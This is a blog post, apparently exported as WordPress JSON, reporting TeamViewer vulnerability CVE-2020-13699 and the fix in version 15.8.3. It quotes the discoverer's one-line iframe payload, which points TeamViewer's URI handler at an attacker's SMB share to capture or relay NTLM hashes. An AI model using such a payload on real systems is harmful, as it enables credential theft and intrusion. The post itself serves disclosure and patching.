{"id":15293,"date":"2020-08-10T00:17:08","date_gmt":"2020-08-09T22:17:08","guid":{"rendered":"http:\/\/159.69.82.204\/win\/?p=15293"},"modified":"2020-11-24T17:22:58","modified_gmt":"2020-11-24T16:22:58","slug":"teamviewer-patch-closes-vulnerability-cve-2020-13699-on-pc","status":"publish","type":"post","link":"https:\/\/borncity.com\/win\/2020\/08\/10\/teamviewer-patch-closes-vulnerability-cve-2020-13699-on-pc\/","title":{"rendered":"TeamViewer: Patch closes vulnerability CVE-2020-13699 on PC"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline\" src=\"https:\/\/www.borncity.com\/blog\/wp-content\/uploads\/2015\/01\/Schutz.jpg\" width=\"40\" align=\"left\" height=\"47\">[<a href=\"https:\/\/www.borncity.com\/blog\/2020\/08\/10\/teamviewer-patch-verhindert-ungewollten-zugriff-auf-pc\/\" target=\"_blank\" rel=\"noopener noreferrer\">German<\/a>]There was a vulnerability in older versions of the TeamViewer remote access software. This allowed third parties to establish a connection to the respective PC unnoticed. The vulnerability has been fixed by a patch.<\/p>\n<h2>The vulnerability CVE-2020-13699<\/h2>\n<p>Vulnerability <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-13699\">CVE-2020-13699<\/a> affected TeamViewer Desktop for Windows up to version 15.8.2, which did not correctly quote its custom URI handlers. A malicious website could start TeamViewer with arbitrary parameters, such as:<\/p>\n<p><em>teamviewer10: --play URL<\/em><\/p>\n<p>This allowed an attacker to force a victim to send an NTLM authentication request and either forward the request or capture the hash for offline password cracking.
The discoverer of the vulnerability describes it <a href=\"https:\/\/web.archive.org\/web\/20201002193825\/https:\/\/jeffs.sh\/CVEs\/CVE-2020-13699.txt\" target=\"_blank\" rel=\"noopener noreferrer\">here<\/a> as follows:<\/p>\n<blockquote>\n<p>An attacker could embed a malicious iframe in a website with a crafted URL:<\/p>\n<p>&lt;iframe src=\"teamviewer10: --play \\\\attacker-IP\\share\\fake.tvs\"&gt;<\/p>\n<p>that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).<\/p>\n<\/blockquote>\n<p>This could be used in watering hole attacks to connect unnoticed, as you can <a href=\"https:\/\/www.helpnetsecurity.com\/2020\/08\/06\/cve-2020-13699\/\" target=\"_blank\" rel=\"noopener noreferrer\">read here<\/a>. Not even a password is required. However, so far there is no indication that the vulnerability is being exploited.<\/p>\n<h2>Update to TeamViewer version 15.8.3<\/h2>\n<p>At Bleeping Computer I <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/teamviewer-fixes-bug-that-lets-attackers-access-your-pc\/\" target=\"_blank\" rel=\"noopener noreferrer\">noticed here<\/a> that there was an update of TeamViewer to version 15.8.3 which closes the vulnerability. However, the vendor <a href=\"https:\/\/community.teamviewer.com\/t5\/Announcements\/Statement-on-CVE-2020-13699\/m-p\/99129\" target=\"_blank\" rel=\"noopener noreferrer\">announced<\/a> the update in this community post about 2 weeks ago.<\/p>\n<blockquote>\n<h4>\n<p>Statement on CVE 2020-13699<\/p>\n<p>Today we are releasing some updates for TeamViewer 8 through 15, for the Windows platform.
<\/p>\n<p>We implemented some improvements in URI handling relating to CVE 2020-13699.<\/p>\n<\/h4>\n<\/blockquote>\n<p><font size=\"3\">The changes can be found in <a href=\"https:\/\/community.teamviewer.com\/t5\/Change-Logs\/bd-p\/Change_Logs_EN\" target=\"_blank\" rel=\"noopener noreferrer\">the changelog<\/a>. <\/font><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[German]There was a vulnerability in older versions of the TeamViewer remote access software. This allowed third parties to establish a connection to the respective PC unnoticed. The vulnerability has been fixed by a patch.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[580,1547,22],"tags":[1179],"class_list":["post-15293","post","type-post","status-publish","format-standard","hentry","category-security","category-software","category-update","tag-teamviewer"],"_links":{"self":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts\/15293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/comments?post=15293"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts\/15293\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/media?parent=15293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/categories?post=15293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/tags?post=15293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}